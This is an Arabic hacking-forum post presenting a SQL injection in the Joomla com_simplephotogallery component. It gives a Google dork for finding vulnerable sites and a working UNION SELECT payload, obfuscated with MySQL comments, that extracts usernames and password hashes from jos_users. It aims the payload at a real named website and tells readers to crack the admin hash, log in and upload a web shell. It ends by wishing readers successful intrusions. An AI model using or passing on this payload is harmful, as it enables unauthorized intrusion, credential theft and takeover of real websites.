أعضاء و زوار جيوش الهكرز، لكم مني أجمل تحية
من إكتشافي، ثغرة SQL injection في سكربت جوملا com_simplephotogallery
الشــــــــــــــــرح
نضع الدرك في محرك البحث google
كود:
inurl:"index.php?option=com_simplephotogallery"
جل هذه المواقع مصابة
أنا إخترت هذا الموقع
كود:
http://www.nbc.org.bd/
نضيف هذا الإستغلال مباشرة بعد رابط الموقع
كود:
index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users--+
فيصبح الرابط هكذا
كود:
http://www.nbc.org.bd/index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users--+
سنتحصل على يوزر و باس الأدمن
بعد فك الهاش ندخل لوحة التحكم و نرفع الشل
ختاما، أتمنى لكم إختراقات موفقة